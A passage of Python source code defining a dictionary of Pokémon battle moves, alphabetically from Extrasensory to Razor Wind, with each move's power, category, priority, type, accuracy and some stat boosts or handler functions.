handler=handle_explosion,
accuracy=1.000000),
"Extrasensory": DamagingMove("Extrasensory",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Extreme Speed": DamagingMove("Extreme Speed",
power=80,
category="Physical",
priority=2,
type="Normal",
accuracy=1.000000),
"Facade": DamagingMove("Facade",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Fairy Lock": Move("Fairy Lock",
category="Non-Damaging",
type="Fairy"),
"Fairy Wind": DamagingMove("Fairy Wind",
power=40,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Fake Out": DamagingMove("Fake Out",
power=40,
category="Physical",
priority=3,
type="Normal",
accuracy=1.000000),
"Fake Tears": Move("Fake Tears",
category="Non-Damaging",
type="Dark"),
"False Swipe": DamagingMove("False Swipe",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Feather Dance": Move("Feather Dance",
category="Non-Damaging",
type="Flying"),
"Feint": DamagingMove("Feint",
power=30,
category="Physical",
priority=2,
type="Normal",
accuracy=1.000000),
"Feint Attack": DamagingMove("Feint Attack",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=0.000000),
"Fell Stinger": DamagingMove("Fell Stinger",
power=30,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Fiery Dance": DamagingMove("Fiery Dance",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Final Gambit": DamagingMove("Final Gambit",
power=0,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Fire Blast": DamagingMove("Fire Blast",
power=110,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Fire Fang": DamagingMove("Fire Fang",
power=65,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000),
"Fire Pledge": DamagingMove("Fire Pledge",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Fire Punch": DamagingMove("Fire Punch",
power=75,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Fire Spin": DamagingMove("Fire Spin",
power=35,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Fissure": DamagingMove("Fissure",
power=0,
category="Physical",
priority=0,
type="Ground",
accuracy=0.300000),
"Flail": DamagingMove("Flail",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Flame Burst": DamagingMove("Flame Burst",
power=70,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Flame Charge": DamagingMove("Flame Charge",
power=50,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Flame Wheel": DamagingMove("Flame Wheel",
power=60,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Flamethrower": DamagingMove("Flamethrower",
power=90,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Flare Blitz": DamagingMove("Flare Blitz",
power=120,
category="Physical",
priority=0,
type="Fire",
handler=handle_flare_blitz,
accuracy=1.000000),
"Flash": Move("Flash",
category="Non-Damaging",
type="Normal"),
"Flash Cannon": DamagingMove("Flash Cannon",
power=80,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
"Flatter": BoostingMove("Flatter",
category="Non-Damaging",
type="Dark",
boosts={
}),
"Fling": DamagingMove("Fling",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Flower Shield": Move("Flower Shield",
category="Non-Damaging",
type="Fairy"),
"Fly": DamagingMove("Fly",
power=90,
category="Physical",
priority=0,
type="Flying",
accuracy=0.950000),
"Flying Press": DamagingMove("Flying Press",
power=80,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.950000),
"Focus Blast": DamagingMove("Focus Blast",
power=120,
category="Special",
priority=0,
type="Fighting",
accuracy=0.700000),
"Focus Energy": Move("Focus Energy",
category="Non-Damaging",
type="Normal"),
"Focus Punch": DamagingMove("Focus Punch",
power=150,
category="Physical",
priority=-3,
type="Fighting",
accuracy=1.000000),
"Follow Me": Move("Follow Me",
category="Non-Damaging",
type="Normal"),
"Force Palm": DamagingMove("Force Palm",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Foresight": Move("Foresight",
category="Non-Damaging",
type="Normal"),
"Forest's Curse": Move("Forest's Curse",
category="Non-Damaging",
type="Grass"),
"Foul Play": DamagingMove("Foul Play",
power=95,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Freeze Shock": DamagingMove("Freeze Shock",
power=140,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Freeze-Dry": DamagingMove("Freeze-Dry",
power=70,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Frenzy Plant": DamagingMove("Frenzy Plant",
power=150,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Frost Breath": DamagingMove("Frost Breath",
power=60,
category="Special",
priority=0,
type="Ice",
accuracy=0.900000),
"Frustration": DamagingMove("Frustration",
power=102,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Fury Attack": DamagingMove("Fury Attack",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Fury Cutter": DamagingMove("Fury Cutter",
power=40,
category="Physical",
priority=0,
type="Bug",
accuracy=0.950000),
"Fury Swipes": DamagingMove("Fury Swipes",
power=18,
category="Physical",
priority=0,
type="Normal",
accuracy=0.800000),
"Fusion Bolt": DamagingMove("Fusion Bolt",
power=100,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Fusion Flare": DamagingMove("Fusion Flare",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Future Sight": DamagingMove("Future Sight",
power=120,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Gastro Acid": Move("Gastro Acid",
category="Non-Damaging",
type="Poison"),
"Gear Grind": DamagingMove("Gear Grind",
power=50,
category="Physical",
priority=0,
type="Steel",
accuracy=0.850000),
"Geomancy": Move("Geomancy",
category="Non-Damaging",
type="Fairy"),
"Giga Drain": DamagingMove("Giga Drain",
power=75,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Giga Impact": DamagingMove("Giga Impact",
power=150,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Glaciate": DamagingMove("Glaciate",
power=65,
category="Special",
priority=0,
type="Ice",
accuracy=0.950000),
"Glare": Move("Glare",
category="Non-Damaging",
type="Normal"),
"Grass Knot": DamagingMove("Grass Knot",
power=0,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Grass Pledge": DamagingMove("Grass Pledge",
power=80,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Grass Whistle": Move("Grass Whistle",
category="Non-Damaging",
type="Grass"),
"Grassy Terrain": Move("Grassy Terrain",
category="Non-Damaging",
type="Grass"),
"Gravity": Move("Gravity",
category="Non-Damaging",
type="Psychic"),
"Growl": Move("Growl",
category="Non-Damaging",
type="Normal"),
"Growth": BoostingMove("Growth",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1,
'spatk': 1
}),
"Grudge": Move("Grudge",
category="Non-Damaging",
type="Ghost"),
"Guard Split": Move("Guard Split",
category="Non-Damaging",
type="Psychic"),
"Guard Swap": Move("Guard Swap",
category="Non-Damaging",
type="Psychic"),
"Guillotine": DamagingMove("Guillotine",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.300000),
"Gunk Shot": DamagingMove("Gunk Shot",
power=120,
category="Physical",
priority=0,
type="Poison",
accuracy=0.800000),
"Gust": DamagingMove("Gust",
power=40,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Gyro Ball": DamagingMove("Gyro Ball",
power=0,
power_handler=power_gyro_ball,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Hail": Move("Hail",
category="Non-Damaging",
type="Ice"),
"Hammer Arm": DamagingMove("Hammer Arm",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Happy Hour": Move("Happy Hour",
category="Non-Damaging",
type="Normal"),
"Harden": BoostingMove("Harden",
category="Non-Damaging",
type="Normal",
boosts={
'pdef': 1,
}),
"Haze": Move("Haze",
category="Non-Damaging",
type="Ice"),
"Head Charge": DamagingMove("Head Charge",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Head Smash": DamagingMove("Head Smash",
power=150,
category="Physical",
priority=0,
type="Rock",
accuracy=0.800000),
"Headbutt": DamagingMove("Headbutt",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Heal Bell": Move("Heal Bell",
category="Non-Damaging",
type="Normal",
handler=handle_heal_bell),
"Heal Block": Move("Heal Block",
category="Non-Damaging",
type="Psychic"),
"Heal Order": Move("Heal Order",
category="Non-Damaging",
type="Bug"),
"Heal Pulse": Move("Heal Pulse",
category="Non-Damaging",
type="Psychic"),
"Healing Wish": Move("Healing Wish",
category="Non-Damaging",
type="Psychic"),
"Heart Stamp": DamagingMove("Heart Stamp",
power=60,
category="Physical",
priority=0,
type="Psychic",
accuracy=1.000000),
"Heart Swap": Move("Heart Swap",
category="Non-Damaging",
type="Psychic"),
"Heat Crash": DamagingMove("Heat Crash",
power=0,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Heat Wave": DamagingMove("Heat Wave",
power=95,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Heavy Slam": DamagingMove("Heavy Slam",
power=0,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Helping Hand": Move("Helping Hand",
category="Non-Damaging",
type="Normal"),
"Hex": DamagingMove("Hex",
power=65,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Hidden Power [Bug]": DamagingMove("Hidden Power [Bug]",
power=60,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Hidden Power [Dark]": DamagingMove("Hidden Power [Dark]",
power=60,
category="Special",
priority=0,
type="Dark",
accuracy=1.000000),
"Hidden Power [Dragon]": DamagingMove("Hidden Power [Dragon]",
power=60,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Hidden Power [Electric]": DamagingMove("Hidden Power [Electric]",
power=60,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Hidden Power [Fighting]": DamagingMove("Hidden Power [Fighting]",
power=60,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Hidden Power [Fire]": DamagingMove("Hidden Power [Fire]",
power=60,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Hidden Power [Flying]": DamagingMove("Hidden Power [Flying]",
power=60,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Hidden Power [Ghost]": DamagingMove("Hidden Power [Ghost]",
power=60,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Hidden Power [Grass]": DamagingMove("Hidden Power [Grass]",
power=60,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Hidden Power [Ground]": DamagingMove("Hidden Power [Ground]",
power=60,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Hidden Power [Ice]": DamagingMove("Hidden Power [Ice]",
power=60,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Hidden Power [Poison]": DamagingMove("Hidden Power [Poison]",
power=60,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Hidden Power [Psychic]": DamagingMove("Hidden Power [Psychic]",
power=60,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Hidden Power [Rock]": DamagingMove("Hidden Power [Rock]",
power=60,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Hidden Power [Steel]": DamagingMove("Hidden Power [Steel]",
power=60,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
"Hidden Power [Water]": DamagingMove("Hidden Power [Water]",
power=60,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"High Jump Kick": DamagingMove("High Jump Kick",
power=130,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Hold Back": DamagingMove("Hold Back",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Hold Hands": Move("Hold Hands",
category="Non-Damaging",
type="Normal"),
"Hone Claws": BoostingMove("Hone Claws",
category="Non-Damaging",
type="Dark",
boosts={
'patk': 1,
'acc': 1
}),
"Horn Attack": DamagingMove("Horn Attack",
power=65,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Horn Drill": DamagingMove("Horn Drill",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.300000),
"Horn Leech": DamagingMove("Horn Leech",
power=75,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Howl": BoostingMove("Howl",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1
}),
"Hurricane": DamagingMove("Hurricane",
power=110,
category="Special",
priority=0,
type="Flying",
accuracy=0.700000),
"Hydro Cannon": DamagingMove("Hydro Cannon",
power=150,
category="Special",
priority=0,
type="Water",
accuracy=0.900000),
"Hydro Pump": DamagingMove("Hydro Pump",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.800000),
"Hyper Beam": DamagingMove("Hyper Beam",
power=150,
category="Special",
priority=0,
type="Normal",
accuracy=0.900000),
"Hyper Fang": DamagingMove("Hyper Fang",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Hyper Voice": DamagingMove("Hyper Voice",
power=90,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Hyperspace Fury": DamagingMove("Hyperspace Fury",
power=100,
category="Special",
priority=0,
type="Dark",
accuracy=0.000000),
"Hyperspace Hole": DamagingMove("Hyperspace Hole",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=0.000000),
"Hypnosis": Move("Hypnosis",
category="Non-Damaging",
type="Psychic"),
"Ice Ball": DamagingMove("Ice Ball",
power=30,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Ice Beam": DamagingMove("Ice Beam",
power=90,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Ice Burn": DamagingMove("Ice Burn",
power=140,
category="Special",
priority=0,
type="Ice",
accuracy=0.900000),
"Ice Fang": DamagingMove("Ice Fang",
power=65,
category="Physical",
priority=0,
type="Ice",
accuracy=0.950000),
"Ice Punch": DamagingMove("Ice Punch",
power=75,
category="Physical",
priority=0,
type="Ice",
accuracy=1.000000),
"Ice Shard": DamagingMove("Ice Shard",
power=40,
category="Physical",
priority=1,
type="Ice",
accuracy=1.000000),
"Icicle Crash": DamagingMove("Icicle Crash",
power=85,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Icicle Spear": DamagingMove("Icicle Spear",
power=25,
category="Physical",
priority=0,
type="Ice",
accuracy=1.000000),
"Icy Wind": DamagingMove("Icy Wind",
power=55,
category="Special",
priority=0,
type="Ice",
handler=handle_icy_wind,
accuracy=0.950000),
"Imprison": Move("Imprison",
category="Non-Damaging",
type="Psychic"),
"Incinerate": DamagingMove("Incinerate",
power=60,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Inferno": DamagingMove("Inferno",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=0.500000),
"Infestation": DamagingMove("Infestation",
power=20,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Ingrain": Move("Ingrain",
category="Non-Damaging",
type="Grass"),
"Ion Deluge": Move("Ion Deluge",
category="Non-Damaging",
type="Electric"),
"Iron Defense": BoostingMove("Iron Defense",
category="Non-Damaging",
type="Steel",
boosts={
'pdef': 2
}),
"Iron Head": DamagingMove("Iron Head",
power=80,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Iron Tail": DamagingMove("Iron Tail",
power=100,
category="Physical",
priority=0,
type="Steel",
accuracy=0.750000),
"Judgment": DamagingMove("Judgment",
power=100,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Jump Kick": DamagingMove("Jump Kick",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.950000),
"Karate Chop": DamagingMove("Karate Chop",
power=50,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Kinesis": Move("Kinesis",
category="Non-Damaging",
type="Psychic"),
"King's Shield": Move("King's Shield",
category="Non-Damaging",
type="Steel"),
"Knock Off": DamagingMove("Knock Off",
power=65,
category="Physical",
priority=0,
type="Dark",
handler=handle_knock_off,
accuracy=1.000000),
"Land's Wrath": DamagingMove("Land's Wrath",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Last Resort": DamagingMove("Last Resort",
power=140,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Lava Plume": DamagingMove("Lava Plume",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Leaf Blade": DamagingMove("Leaf Blade",
power=90,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Leaf Storm": DamagingMove("Leaf Storm",
power=130,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Leaf Tornado": DamagingMove("Leaf Tornado",
power=65,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Leech Life": DamagingMove("Leech Life",
power=20,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Leech Seed": Move("Leech Seed",
category="Non-Damaging",
type="Grass"),
"Leer": Move("Leer",
category="Non-Damaging",
type="Normal"),
"Lick": DamagingMove("Lick",
power=30,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Light Screen": Move("Light Screen",
category="Non-Damaging",
type="Psychic"),
"Light of Ruin": DamagingMove("Light of Ruin",
power=140,
category="Special",
priority=0,
type="Fairy",
accuracy=0.900000),
"Lock-On": Move("Lock-On",
category="Non-Damaging",
type="Normal"),
"Lovely Kiss": Move("Lovely Kiss",
category="Non-Damaging",
type="Normal"),
"Low Kick": DamagingMove("Low Kick",
power=0,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Low Sweep": DamagingMove("Low Sweep",
power=65,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Lucky Chant": Move("Lucky Chant",
category="Non-Damaging",
type="Normal"),
"Lunar Dance": Move("Lunar Dance",
category="Non-Damaging",
type="Psychic"),
"Luster Purge": DamagingMove("Luster Purge",
power=70,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Mach Punch": DamagingMove("Mach Punch",
power=40,
category="Physical",
priority=1,
type="Fighting",
accuracy=1.000000),
"Magic Coat": Move("Magic Coat",
category="Non-Damaging",
type="Psychic"),
"Magic Room": Move("Magic Room",
category="Non-Damaging",
type="Psychic"),
"Magical Leaf": DamagingMove("Magical Leaf",
power=60,
category="Special",
priority=0,
type="Grass",
accuracy=0.000000),
"Magma Storm": DamagingMove("Magma Storm",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=0.750000),
"Magnet Bomb": DamagingMove("Magnet Bomb",
power=60,
category="Physical",
priority=0,
type="Steel",
accuracy=0.000000),
"Magnet Rise": Move("Magnet Rise",
category="Non-Damaging",
type="Electric"),
"Magnetic Flux": Move("Magnetic Flux",
category="Non-Damaging",
type="Electric"),
"Magnitude": DamagingMove("Magnitude",
power=0,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Mat Block": Move("Mat Block",
category="Non-Damaging",
type="Fighting"),
"Me First": Move("Me First",
category="Non-Damaging",
type="Normal"),
"Mean Look": Move("Mean Look",
category="Non-Damaging",
type="Normal"),
"Meditate": BoostingMove("Meditate",
category="Non-Damaging",
type="Psychic",
boosts={
'patk': 1
}),
"Mega Drain": DamagingMove("Mega Drain",
power=40,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Mega Kick": DamagingMove("Mega Kick",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Mega Punch": DamagingMove("Mega Punch",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Megahorn": DamagingMove("Megahorn",
power=120,
category="Physical",
priority=0,
type="Bug",
accuracy=0.850000),
"Memento": Move("Memento",
category="Non-Damaging",
type="Dark"),
"Metal Burst": DamagingMove("Metal Burst",
power=0,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Metal Claw": DamagingMove("Metal Claw",
power=50,
category="Physical",
priority=0,
type="Steel",
accuracy=0.950000),
"Metal Sound": Move("Metal Sound",
category="Non-Damaging",
type="Steel"),
"Meteor Mash": DamagingMove("Meteor Mash",
power=90,
category="Physical",
priority=0,
type="Steel",
accuracy=0.900000),
"Metronome": Move("Metronome",
category="Non-Damaging",
type="Normal"),
"Milk Drink": Move("Milk Drink",
category="Non-Damaging",
type="Normal"),
"Mimic": Move("Mimic",
category="Non-Damaging",
type="Normal"),
"Mind Reader": Move("Mind Reader",
category="Non-Damaging",
type="Normal"),
"Minimize": BoostingMove("Minimize",
category="Non-Damaging",
type="Normal",
boosts={
'eva': 2
}),
"Miracle Eye": Move("Miracle Eye",
category="Non-Damaging",
type="Psychic"),
"Mirror Coat": DamagingMove("Mirror Coat",
power=0,
category="Special",
priority=-5,
type="Psychic",
accuracy=1.000000),
"Mirror Move": Move("Mirror Move",
category="Non-Damaging",
type="Flying"),
"Mirror Shot": DamagingMove("Mirror Shot",
power=65,
category="Special",
priority=0,
type="Steel",
accuracy=0.850000),
"Mist": Move("Mist",
category="Non-Damaging",
type="Ice"),
"Mist Ball": DamagingMove("Mist Ball",
power=70,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Misty Terrain": Move("Misty Terrain",
category="Non-Damaging",
type="Fairy"),
"Moonblast": DamagingMove("Moonblast",
power=95,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Moonlight": HealingMove("Moonlight",
category="Non-Damaging",
type="Fairy",
healing_percent=0.5),
"Morning Sun": Move("Morning Sun",
category="Non-Damaging",
type="Normal"),
"Mud Bomb": DamagingMove("Mud Bomb",
power=65,
category="Special",
priority=0,
type="Ground",
accuracy=0.850000),
"Mud Shot": DamagingMove("Mud Shot",
power=55,
category="Special",
priority=0,
type="Ground",
accuracy=0.950000),
"Mud Sport": Move("Mud Sport",
category="Non-Damaging",
type="Ground"),
"Mud-Slap": DamagingMove("Mud-Slap",
power=20,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Muddy Water": DamagingMove("Muddy Water",
power=90,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Mystical Fire": DamagingMove("Mystical Fire",
power=65,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Nasty Plot": BoostingMove("Nasty Plot",
category="Non-Damaging",
type="Dark",
boosts={
'spatk': 2
}),
"Natural Gift": DamagingMove("Natural Gift",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Nature Power": Move("Nature Power",
category="Non-Damaging",
type="Normal"),
"Needle Arm": DamagingMove("Needle Arm",
power=60,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Night Daze": DamagingMove("Night Daze",
power=85,
category="Special",
priority=0,
type="Dark",
accuracy=0.950000),
"Night Shade": DamagingMove("Night Shade",
power=0,
category="Special",
priority=0,
type="Ghost",
handler=handle_night_shade,
accuracy=1.000000),
"Night Slash": DamagingMove("Night Slash",
power=70,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Nightmare": Move("Nightmare",
category="Non-Damaging",
type="Ghost"),
"Noble Roar": Move("Noble Roar",
category="Non-Damaging",
type="Normal"),
"Nuzzle": DamagingMove("Nuzzle",
power=20,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Oblivion Wing": DamagingMove("Oblivion Wing",
power=80,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Octazooka": DamagingMove("Octazooka",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Odor Sleuth": Move("Odor Sleuth",
category="Non-Damaging",
type="Normal"),
"Ominous Wind": DamagingMove("Ominous Wind",
power=60,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Origin Pulse": DamagingMove("Origin Pulse",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Outrage": DamagingMove("Outrage",
power=120,
category="Physical",
priority=0,
type="Dragon",
accuracy=1.000000),
"Overheat": DamagingMove("Overheat",
power=130,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Pain Split": Move("Pain Split",
category="Non-Damaging",
type="Normal",
handler=handle_pain_split),
"Parabolic Charge": DamagingMove("Parabolic Charge",
power=50,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Parting Shot": Move("Parting Shot",
category="Non-Damaging",
type="Dark"),
"Pay Day": DamagingMove("Pay Day",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Payback": DamagingMove("Payback",
power=50,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Peck": DamagingMove("Peck",
power=35,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Perish Song": Move("Perish Song",
category="Non-Damaging",
type="Normal"),
"Petal Blizzard": DamagingMove("Petal Blizzard",
power=90,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Petal Dance": DamagingMove("Petal Dance",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Phantom Force": DamagingMove("Phantom Force",
power=90,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Pin Missile": DamagingMove("Pin Missile",
power=25,
category="Physical",
priority=0,
type="Bug",
accuracy=0.950000),
"Play Nice": Move("Play Nice",
category="Non-Damaging",
type="Normal"),
"Play Rough": DamagingMove("Play Rough",
power=90,
category="Physical",
priority=0,
type="Fairy",
accuracy=0.900000),
"Pluck": DamagingMove("Pluck",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Poison Fang": DamagingMove("Poison Fang",
power=50,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Gas": Move("Poison Gas",
category="Non-Damaging",
type="Poison"),
"Poison Jab": DamagingMove("Poison Jab",
power=80,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Powder": Move("Poison Powder",
category="Non-Damaging",
type="Poison"),
"Poison Sting": DamagingMove("Poison Sting",
power=15,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Tail": DamagingMove("Poison Tail",
power=50,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Pound": DamagingMove("Pound",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Powder": Move("Powder",
category="Non-Damaging",
type="Bug"),
"Powder Snow": DamagingMove("Powder Snow",
power=40,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Power Gem": DamagingMove("Power Gem",
power=80,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Power Split": Move("Power Split",
category="Non-Damaging",
type="Psychic"),
"Power Swap": Move("Power Swap",
category="Non-Damaging",
type="Psychic"),
"Power Trick": Move("Power Trick",
category="Non-Damaging",
type="Psychic"),
"Power Whip": DamagingMove("Power Whip",
power=120,
category="Physical",
priority=0,
type="Grass",
accuracy=0.850000),
"Power-Up Punch": DamagingMove("Power-Up Punch",
power=40,
category="Physical",
priority=0,
type="Fighting",
handler=handle_powerup_punch,
accuracy=1.000000),
"Precipice Blades": DamagingMove("Precipice Blades",
power=120,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Present": DamagingMove("Present",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Protect": Move("Protect",
category="Non-Damaging",
type="Normal"),
"Psybeam": DamagingMove("Psybeam",
power=65,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psych Up": Move("Psych Up",
category="Non-Damaging",
type="Normal"),
"Psychic": DamagingMove("Psychic",
power=90,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psycho Boost": DamagingMove("Psycho Boost",
power=140,
category="Special",
priority=0,
type="Psychic",
accuracy=0.900000),
"Psycho Cut": DamagingMove("Psycho Cut",
power=70,
category="Physical",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psycho Shift": Move("Psycho Shift",
category="Non-Damaging",
type="Psychic"),
"Psyshock": DamagingMove("Psyshock",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psystrike": DamagingMove("Psystrike",
power=100,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psywave": DamagingMove("Psywave",
power=0,
category="Special",
priority=0,
type="Psychic",
accuracy=0.800000),
"Punishment": DamagingMove("Punishment",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Pursuit": DamagingMove("Pursuit",
power=40,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Quash": Move("Quash",
category="Non-Damaging",
type="Dark"),
"Quick Attack": DamagingMove("Quick Attack",
power=40,
category="Physical",
priority=1,
type="Normal",
accuracy=1.000000),
"Quick Guard": Move("Quick Guard",
category="Non-Damaging",
type="Fighting"),
"Quiver Dance": BoostingMove("Quiver Dance",
category="Non-Damaging",
type="Bug",
boosts={
'spatk': 1,
'spdef': 1,
'spe': 1
}),
"Rage": DamagingMove("Rage",
power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Rage Powder": Move("Rage Powder",
category="Non-Damaging",
type="Bug"),
"Rain Dance": Move("Rain Dance",
category="Non-Damaging",
type="Water"),
"Rapid Spin": DamagingMove("Rapid Spin",
power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Razor Leaf": DamagingMove("Razor Leaf",
power=55,
category="Physical",
priority=0,
type="Grass",
accuracy=0.950000),
"Razor Shell": DamagingMove("Razor Shell",
power=75,
category="Physical",
priority=0,
type="Water",
accuracy=0.950000),
"Razor Wind": DamagingMove("Razor Wind",
